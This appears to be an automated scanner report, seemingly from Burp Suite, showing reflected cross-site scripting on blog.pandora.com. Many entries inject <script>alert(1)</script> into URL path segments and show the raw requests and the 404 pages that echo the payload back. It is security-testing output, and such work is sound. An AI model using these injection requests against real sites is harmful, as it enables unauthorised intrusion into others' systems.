<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
